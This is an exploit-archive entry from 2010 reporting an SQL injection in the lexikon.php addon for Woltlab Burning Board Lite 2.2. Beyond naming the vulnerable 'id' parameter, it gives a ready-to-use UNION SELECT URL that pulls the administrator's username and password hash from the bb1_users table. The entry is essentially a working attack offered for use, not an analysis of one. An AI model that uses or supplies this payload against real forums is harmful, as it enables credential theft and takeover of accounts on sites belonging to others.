Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vuln

2010-03-21T00:00:00
ID 1337DAY-ID-11397
Type zdt
Reporter n3w7u
Modified 2010-03-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================================
Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability
==========================================================================

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
   
 ~ Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability  ~
   
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
  
[+] Autor: n3w7u
  
[+] Vulnerabilities [ SQL Injection ]
 
[+] Page: http://www.mywbb.info/board/thread.php?threadid=125185
 
[+] Language: [ PHP ]
  
[+] Version: 2.2
 
[+] Date: 21.03.2010
  
 
.-=--=--=--=--=--=--=--=--=--=--=-.
  
[+] Vulnerability
  
    lexikon.php?action=show&id=
      
  
[+] Exploitable
  
    http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--



#  0day.today [2018-04-09]  #